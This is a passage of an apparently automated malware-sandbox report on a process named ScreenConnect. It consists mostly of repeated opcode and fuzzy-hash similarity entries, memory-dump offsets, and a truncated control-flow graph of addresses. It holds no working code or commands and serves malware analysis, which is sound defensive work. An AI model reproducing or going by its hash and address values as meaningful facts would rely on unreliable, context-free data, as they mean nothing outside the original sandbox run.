                                                                • Opcode ID: f59e59f030c6f3b0287a73514844cc70fd2821492a1aafc41b3d3d8d15f0cd50
                                                                • Instruction ID: 445ae76c6464fc757a92b2978ea1dd286018370425570698bc0684f9880781fe
                                                                • Opcode Fuzzy Hash: f59e59f030c6f3b0287a73514844cc70fd2821492a1aafc41b3d3d8d15f0cd50
                                                                • Instruction Fuzzy Hash: CDE0E535D103098ADB01DBA4E8446DCFB71FF86310F504256E50577210E7712AD9CB81
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f59e59f030c6f3b0287a73514844cc70fd2821492a1aafc41b3d3d8d15f0cd50
                                                                • Instruction ID: 445ae76c6464fc757a92b2978ea1dd286018370425570698bc0684f9880781fe
                                                                • Opcode Fuzzy Hash: f59e59f030c6f3b0287a73514844cc70fd2821492a1aafc41b3d3d8d15f0cd50
                                                                • Instruction Fuzzy Hash: CDE0E535D103098ADB01DBA4E8446DCFB71FF86310F504256E50577210E7712AD9CB81
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f59e59f030c6f3b0287a73514844cc70fd2821492a1aafc41b3d3d8d15f0cd50
                                                                • Instruction ID: 445ae76c6464fc757a92b2978ea1dd286018370425570698bc0684f9880781fe
                                                                • Opcode Fuzzy Hash: f59e59f030c6f3b0287a73514844cc70fd2821492a1aafc41b3d3d8d15f0cd50
                                                                • Instruction Fuzzy Hash: CDE0E535D103098ADB01DBA4E8446DCFB71FF86310F504256E50577210E7712AD9CB81
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f59e59f030c6f3b0287a73514844cc70fd2821492a1aafc41b3d3d8d15f0cd50
                                                                • Instruction ID: 445ae76c6464fc757a92b2978ea1dd286018370425570698bc0684f9880781fe
                                                                • Opcode Fuzzy Hash: f59e59f030c6f3b0287a73514844cc70fd2821492a1aafc41b3d3d8d15f0cd50
                                                                • Instruction Fuzzy Hash: CDE0E535D103098ADB01DBA4E8446DCFB71FF86310F504256E50577210E7712AD9CB81
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a27dfd8485eae205c6664caf4e3147ba7288f078737fea21007770276f71617a
                                                                • Instruction ID: cd821459518e35d7f3d955c976339be30329464e962ee3b9909be24991f64687
                                                                • Opcode Fuzzy Hash: a27dfd8485eae205c6664caf4e3147ba7288f078737fea21007770276f71617a
                                                                • Instruction Fuzzy Hash: EAE02B7210A3424BFB291B98E0903D5BB38EF03351F14067AF489CB0E6E2A94C81CBD2
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f59e59f030c6f3b0287a73514844cc70fd2821492a1aafc41b3d3d8d15f0cd50
                                                                • Instruction ID: 445ae76c6464fc757a92b2978ea1dd286018370425570698bc0684f9880781fe
                                                                • Opcode Fuzzy Hash: f59e59f030c6f3b0287a73514844cc70fd2821492a1aafc41b3d3d8d15f0cd50
                                                                • Instruction Fuzzy Hash: CDE0E535D103098ADB01DBA4E8446DCFB71FF86310F504256E50577210E7712AD9CB81
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d280765895d3ad415d12084d4345af742df041f43a2e39f2e1d5c9aed68a2d17
                                                                • Instruction ID: 06b50ef9c58b9cfb444217ae41eef508cad4f10b4e0f1f1a0916769486268910
                                                                • Opcode Fuzzy Hash: d280765895d3ad415d12084d4345af742df041f43a2e39f2e1d5c9aed68a2d17
                                                                • Instruction Fuzzy Hash: 25E0122120E3D08FD302DB3C98B08817FB19F8320470A84CBC0958B2A3C6269D0ACBA6
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fa926553dbea9c7a5430891b9108979a3f16cc4d36da4f487aa00aa9d94c7079
                                                                • Instruction ID: 4449ed4f36413a0987a9fa1f5deb080a9935a2188d0d146c8a303b7adacd6bf3
                                                                • Opcode Fuzzy Hash: fa926553dbea9c7a5430891b9108979a3f16cc4d36da4f487aa00aa9d94c7079
                                                                • Instruction Fuzzy Hash: ACE0B671D002299F8B80EFADD9015AEFBF4EF48210B10846AD91CE7201E3319B128FC1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 169cdd6bd4a941c242007eefcc4c294b17db95c0666d6225f1b04b98aee216eb
                                                                • Instruction ID: f82e7427b04ea550c6ab04dbc4f21430433579160c710c4579c1ce68a7f0c489
                                                                • Opcode Fuzzy Hash: 169cdd6bd4a941c242007eefcc4c294b17db95c0666d6225f1b04b98aee216eb
                                                                • Instruction Fuzzy Hash: D9E02B36B04254EFD71A4A44FC15BB53F66DB88311F144029F906C63E1EF368C52CB84
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: edd1922eecef7da0db10e20d28076cb30ef1c245f1631d89ebcc881e179b449a
                                                                • Instruction ID: 3a513132e8c95e982ccdf48afabec03e944dceb8c49082e096cdd9562a6810d6
                                                                • Opcode Fuzzy Hash: edd1922eecef7da0db10e20d28076cb30ef1c245f1631d89ebcc881e179b449a
                                                                • Instruction Fuzzy Hash: E6E02E35B041508FC7208B78A094BA17FE2EF8E200B450488F185CB320C624CC07CB80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 886d356796b891cae711ed95780b1bae6d5d5564a771e2333ea8d13cabcda60c
                                                                • Instruction ID: dc7f0d3e94605b6eb0e64355b00e563ce6086ba0a656e67aae2883d238f28368
                                                                • Opcode Fuzzy Hash: 886d356796b891cae711ed95780b1bae6d5d5564a771e2333ea8d13cabcda60c
                                                                • Instruction Fuzzy Hash: 66D05B343642068BFF19D7759414BB73797BFC4689F5444B4E445C3611EB62E8458154
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 546a47efb76196bb06f2acb8a561f7befbbb577c9091d7872af46a2509cb7bc5
                                                                • Instruction ID: 11e57f6bbb327d486176a2e9930c8d84fff1d21fb2c2dc6f0b3a43b3fed2ff38
                                                                • Opcode Fuzzy Hash: 546a47efb76196bb06f2acb8a561f7befbbb577c9091d7872af46a2509cb7bc5
                                                                • Instruction Fuzzy Hash: 68D052347612254FCB84E738E44896E33EAAF89A2035084A4E80ACB324EEA0EC0187D0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fbf3c4a29417d0d294ad5df3349074a9b59cdc255d0f9b13ce29d8a8fa95e480
                                                                • Instruction ID: ec35012335e063d7a7efd1c84b7cc39ebb7cb0d869e4e6f488ba180e34527f7a
                                                                • Opcode Fuzzy Hash: fbf3c4a29417d0d294ad5df3349074a9b59cdc255d0f9b13ce29d8a8fa95e480
                                                                • Instruction Fuzzy Hash: 4EE08C328107088FC712ABB8D4954E87BB0EE96200B059A4BE08A57121EB30A195DB41
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 72fe2a069eecd53f219ad36672b4c11a2b25ccc82b2ba44e04c51143a153d817
                                                                • Instruction ID: 18b060c35a9acdcb2032f89655f0cfe6325ad5554c9cf9df3f5fe54793c4e539
                                                                • Opcode Fuzzy Hash: 72fe2a069eecd53f219ad36672b4c11a2b25ccc82b2ba44e04c51143a153d817
                                                                • Instruction Fuzzy Hash: 27D05E3A3415189F87049B4EE508C4AFFEAEFC9761305806AFA09C7330CA71EC01CBA4
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c43b0c7f2cedfa82e09fb564520c452c4ce209e8d500baf9de695b6eb1e1b83d
                                                                • Instruction ID: 5e640aae8445d7a075d4b71d7979febd1ccf1d61cb1acf6a824e73259a55c6cd
                                                                • Opcode Fuzzy Hash: c43b0c7f2cedfa82e09fb564520c452c4ce209e8d500baf9de695b6eb1e1b83d
                                                                • Instruction Fuzzy Hash: 04D09E36250118AFD7405B59E948DA57BE9EB49761F15C062FA098B361C672DC109B90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f2d4bcdf12f16bf2cb289271c63b2875e8ea951f18d5cbde244f13883dc6b211
                                                                • Instruction ID: 030fe5aba29a7e8773526a528a67eeec9148086bc51b55180a85422bc91993d6
                                                                • Opcode Fuzzy Hash: f2d4bcdf12f16bf2cb289271c63b2875e8ea951f18d5cbde244f13883dc6b211
                                                                • Instruction Fuzzy Hash: C8D05E30A0020DFFDB44EFF9ED005AEB7B9EB49304B104AA9D908E7240EA316F049B90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3eef03e1398d23ee90c9881a2560892aad7a60bb9814a666dd38a368a24bf2eb
                                                                • Instruction ID: 32c8817c430ddffbfce4e59f05f729a8b3283a891a96155821ca5fecaa3c4780
                                                                • Opcode Fuzzy Hash: 3eef03e1398d23ee90c9881a2560892aad7a60bb9814a666dd38a368a24bf2eb
                                                                • Instruction Fuzzy Hash: DFD01270A01209EB8B04DFA4E95555DBFF5EB85204B1045ADD408E3200EB315E019B80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ad74937f26bddf323202c946c0444f38992b2b473b6627e4fde4ba165b8bf3d7
                                                                • Instruction ID: fc344571c207b41b187fe19c0bdfcc84adb0e219bf8625f30c93d62fdc81786d
                                                                • Opcode Fuzzy Hash: ad74937f26bddf323202c946c0444f38992b2b473b6627e4fde4ba165b8bf3d7
                                                                • Instruction Fuzzy Hash: 1CD01770A5130EEF8B04EFA9EA1059EBBFAEB45200B1045AC9408D3200EA316E009B80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 254364928de805be6a2d255a77bd912dec67d6a02124c452ba26eed4b789dba2
                                                                • Instruction ID: 553ea0b79af10fdc9f107c9fa3af58a8f5f902a172e4c510d5c502cc97f63eb9
                                                                • Opcode Fuzzy Hash: 254364928de805be6a2d255a77bd912dec67d6a02124c452ba26eed4b789dba2
                                                                • Instruction Fuzzy Hash: BED01270A0020DEB9F04DFB8E90055DB7B5EB59204B1085A9D808D3310EA31AE049B44
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5abb42da74fcf284e0dc63408b9a8c32d0e8f3d9c94726214b9f581c00f43246
                                                                • Instruction ID: 6f63e9520880b50afbd4f3fce0775834568021dc976ba160ecc3ce0285e74682
                                                                • Opcode Fuzzy Hash: 5abb42da74fcf284e0dc63408b9a8c32d0e8f3d9c94726214b9f581c00f43246
                                                                • Instruction Fuzzy Hash: F9D01730A1021DEBDB44DFA8F90069DB7F9EB45304B1049A8D808E7210EA31AE059B90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 49f320fbb7ffbdf17eaf9c6236d13dac693e2aefa917858c3a3cfde032949bf0
                                                                • Instruction ID: 8c1185a0640e5a3bf674617cffb9844c9be571924e33d25356a53fd0f817c44b
                                                                • Opcode Fuzzy Hash: 49f320fbb7ffbdf17eaf9c6236d13dac693e2aefa917858c3a3cfde032949bf0
                                                                • Instruction Fuzzy Hash: 94D01730A11219EBDB44DFA8F94069DBBB5EB45304B1049A8D808E7210EA31AF069B80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 81646de086942b5cae10e57538a01e6a3d6ff7d4792d38a11d079fe65a790058
                                                                • Instruction ID: 730d71f6cfd693768628316718dfb229ed524a360a8a2155347c77650df5a0f4
                                                                • Opcode Fuzzy Hash: 81646de086942b5cae10e57538a01e6a3d6ff7d4792d38a11d079fe65a790058
                                                                • Instruction Fuzzy Hash: 9DD05E7A1492848FC7028B64E954CA03FF4AF5A60432A84C2E148CB273D621EC06CFA1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7f07d386c04c6a2feffa0c50a1109cdec5538d9b109130c7fe4f2e4fc10fc497
                                                                • Instruction ID: da695240a23256fbe3f8c6bcf750961a8df59f15cd6f3cc741834567a2b0b1c0
                                                                • Opcode Fuzzy Hash: 7f07d386c04c6a2feffa0c50a1109cdec5538d9b109130c7fe4f2e4fc10fc497
                                                                • Instruction Fuzzy Hash: 3FD0C932814B0D8AC700BBB8E4584A9B7B8EED5200F00DA5BE88A67121FF70E6D0D691
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dac84bd2391221677ad788e911c7235f27280dfbcb5f71545669e7d5b9c8bce9
                                                                • Instruction ID: cf22bf4274c2144a73b80f18399be93bd1b889ec3d86ad461d97e4917d2c0027
                                                                • Opcode Fuzzy Hash: dac84bd2391221677ad788e911c7235f27280dfbcb5f71545669e7d5b9c8bce9
                                                                • Instruction Fuzzy Hash: B9D0C9342080408FC304CB64C991A10BFB1EB8A204B18C0C994898B363C626DD43C744
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5863a4bf353d0e82bfd85900691e7303709822a55b34146c3b316da03f85c09c
                                                                • Instruction ID: 3b7229f155f156c3e662083fc0c38e0bcba996d39835850ee6d616ee161a603a
                                                                • Opcode Fuzzy Hash: 5863a4bf353d0e82bfd85900691e7303709822a55b34146c3b316da03f85c09c
                                                                • Instruction Fuzzy Hash: 77C04C6560E3C15FD75F173448250A83F326E9314434B0CEBC0818F5A3C66A4D4BC321
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f027a6969187ef76d88376f9fd496b5a66eb724b4b472ea2d1d81761e304ce95
                                                                • Instruction ID: 6d0d33caaaddde58ee6e2d36086840e697868d812a07a74fe728d2690965d916
                                                                • Opcode Fuzzy Hash: f027a6969187ef76d88376f9fd496b5a66eb724b4b472ea2d1d81761e304ce95
                                                                • Instruction Fuzzy Hash: FCC01223A0D290CFC703C72898342443BA06CA20007CE00C58C819B221E4297C20D2B3
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 36f8bfab13cd057fd3552da75a2089a267d0e53626c1d187abbf0cf2a6b65772
                                                                • Instruction ID: 50febbe312b41ff2c4c3a49cd703755e7e3a6811debab3536aaf097181569e9c
                                                                • Opcode Fuzzy Hash: 36f8bfab13cd057fd3552da75a2089a267d0e53626c1d187abbf0cf2a6b65772
                                                                • Instruction Fuzzy Hash: D3C002792501048F8700DB58E688C117BE8AB486143258194E5088B322C621FC018A91
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 622889c1e0d199b481d6f21c0cca11f2f78d983c7712ca58016f2486bc26cfb3
                                                                • Instruction ID: 246fb20c69dab38aed005cf143d626a75eec59ab77884f61e57b0a0524c57902
                                                                • Opcode Fuzzy Hash: 622889c1e0d199b481d6f21c0cca11f2f78d983c7712ca58016f2486bc26cfb3
                                                                • Instruction Fuzzy Hash: CFD012314081459FC7415F509904B04FFB0FF46700F098498E1C446061C7354824DB41
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b539ea7ee5a1a4024ba30980ff1ce92416584c755a8b7d717142f6ee0f9c35d2
                                                                • Instruction ID: 7af17b38092c5df374276851ba3aa3884fe17ea31d995989e4dfd638af14cb4c
                                                                • Opcode Fuzzy Hash: b539ea7ee5a1a4024ba30980ff1ce92416584c755a8b7d717142f6ee0f9c35d2
                                                                • Instruction Fuzzy Hash: B3C09B7D1552C24DD749073014147A43F51E7CB549FC85CE8E4C00855185374547D244
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9e531c7556f3d527dcef1ec037cf9e2717eba03a4d407757c40db45949829b8d
                                                                • Instruction ID: fba1df006ee47b4d62fcc1013010dd0c3d3c4d475ad279116ed82f1df4468255
                                                                • Opcode Fuzzy Hash: 9e531c7556f3d527dcef1ec037cf9e2717eba03a4d407757c40db45949829b8d
                                                                • Instruction Fuzzy Hash: D6B092311502088F82009B58D444C0073A8AB08A243010090E1088B232C621FC018A40
                                                                APIs
                                                                • RtlGetVersion.NTDLL(0000009C), ref: 013B4DBE
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3392893400.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_13b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: Version
                                                                • String ID:
                                                                • API String ID: 1889659487-0
                                                                • Opcode ID: 180be0c037c577e44463b6e7a3fdb1a844a44fec4e4d539eaf539ef2c33a21f3
                                                                • Instruction ID: e217078a25e874b738bb9c42ba5a0c0baeccc23d812cc530eaf1ac0e6978c2f1
                                                                • Opcode Fuzzy Hash: 180be0c037c577e44463b6e7a3fdb1a844a44fec4e4d539eaf539ef2c33a21f3
                                                                • Instruction Fuzzy Hash: 11212F71900768DBEB609F19C844B99FBB9BB09314F0082D9D20CA7690C7B56A98CF92

                                                                Execution Graph

                                                                Execution Coverage:12.8%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:5
                                                                Total number of Limit Nodes:1
                                                                execution_graph 12596 7ffd33e28014 12598 7ffd33e2801d 12596->12598 12597 7ffd33e28082 12598->12597 12599 7ffd33e280f6 SetProcessMitigationPolicy 12598->12599 12600 7ffd33e28152 12599->12600

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 7ffd34136d4d-7ffd34136e1e 8 7ffd34136e1f-7ffd34136e44 0->8 12 7ffd34136e46-7ffd34136f1c 8->12 29 7ffd34136f1e-7ffd34136f3a 12->29 30 7ffd34136f66-7ffd34136f76 12->30 31 7ffd34136f40-7ffd34136f5e call 7ffd34130c30 * 2 29->31 32 7ffd34137348-7ffd34137366 call 7ffd34130c30 * 2 29->32 36 7ffd34136f78-7ffd34136f7a 30->36 37 7ffd34136f7c-7ffd34136f8a call 7ffd34130e20 30->37 47 7ffd341371de-7ffd341371fc call 7ffd34130c30 * 2 31->47 48 7ffd34136f64-7ffd34136f65 31->48 49 7ffd34137472-7ffd3413747d 32->49 50 7ffd3413736c-7ffd34137373 32->50 41 7ffd34136f8d-7ffd34136fa2 36->41 37->41 55 7ffd34136fa4-7ffd34136fa6 41->55 56 7ffd34136fa8-7ffd34136fcc call 7ffd34130e70 * 2 41->56 74 7ffd341371fe-7ffd34137208 47->74 75 7ffd34137226-7ffd34137244 call 7ffd34130c30 * 2 47->75 48->30 53 7ffd34137375-7ffd34137384 50->53 54 7ffd34137386-7ffd34137388 50->54 53->54 68 7ffd3413738a 53->68 59 7ffd3413738f-7ffd341373b3 54->59 58 7ffd34136fcf-7ffd34136fe4 55->58 56->58 72 7ffd34136fe6-7ffd34136fe8 58->72 73 7ffd34136fea-7ffd3413700e call 7ffd34130e70 * 2 58->73 70 7ffd341373ff-7ffd3413740e 59->70 71 7ffd341373b5-7ffd341373d2 59->71 68->59 70->49 84 7ffd3413747e-7ffd341374f7 71->84 85 7ffd341373d8-7ffd341373fd 71->85 77 7ffd34137011-7ffd34137026 72->77 73->77 79 7ffd3413721c 74->79 80 7ffd3413720a-7ffd3413721a 74->80 101 7ffd341372fb-7ffd34137306 75->101 102 7ffd3413724a-7ffd34137255 75->102 96 7ffd34137028-7ffd34137061 77->96 97 7ffd3413702c-7ffd3413704f call 7ffd34130e70 77->97 87 7ffd3413721e-7ffd3413721f 79->87 80->87 106 7ffd34137540-7ffd34137568 84->106 107 7ffd341374f9-7ffd3413753d 84->107 85->70 87->75 112 7ffd34137063-7ffd34137065 96->112 113 7ffd34137067-7ffd34137075 call 7ffd34130e20 96->113 116 7ffd34137308-7ffd3413730a 101->116 117 7ffd3413730c-7ffd3413731b call 7ffd34130e20 101->117 114 7ffd34137257-7ffd34137259 102->114 115 7ffd3413725b-7ffd3413726a call 7ffd34130e20 102->115 127 7ffd341375b6-7ffd341375c0 106->127 128 7ffd3413756a-7ffd34137596 106->128 167 7ffd3413753e 107->167 120 7ffd34137078-7ffd34137081 112->120 113->120 121 7ffd3413726d-7ffd341372a1 114->121 115->121 124 7ffd3413731e-7ffd34137320 116->124 117->124 150 7ffd34137088-7ffd3413708f 120->150 121->101 138 7ffd341372a3-7ffd341372b1 121->138 124->49 126 7ffd34137326-7ffd34137347 124->126 148 7ffd341375f2-7ffd341375fb 127->148 149 7ffd341375c2-7ffd341375d1 127->149 135 7ffd34137598-7ffd34137599 128->135 136 7ffd3413759c-7ffd341375b5 128->136 135->136 136->127 142 7ffd341372b3-7ffd341372bb 138->142 143 7ffd341372c4-7ffd341372cc 138->143 144 7ffd341372cd-7ffd341372ce 142->144 151 7ffd341372bd-7ffd341372c2 142->151 143->144 145 7ffd341372de-7ffd341372f8 143->145 152 7ffd341372d3-7ffd341372dd call 7ffd34136b80 144->152 145->101 156 7ffd341375d3-7ffd341375d4 149->156 157 7ffd341375d7-7ffd341375f1 149->157 150->47 158 7ffd34137095-7ffd3413709c 150->158 151->152 152->145 156->157 158->47 159 7ffd341370a2-7ffd341370b9 158->159 169 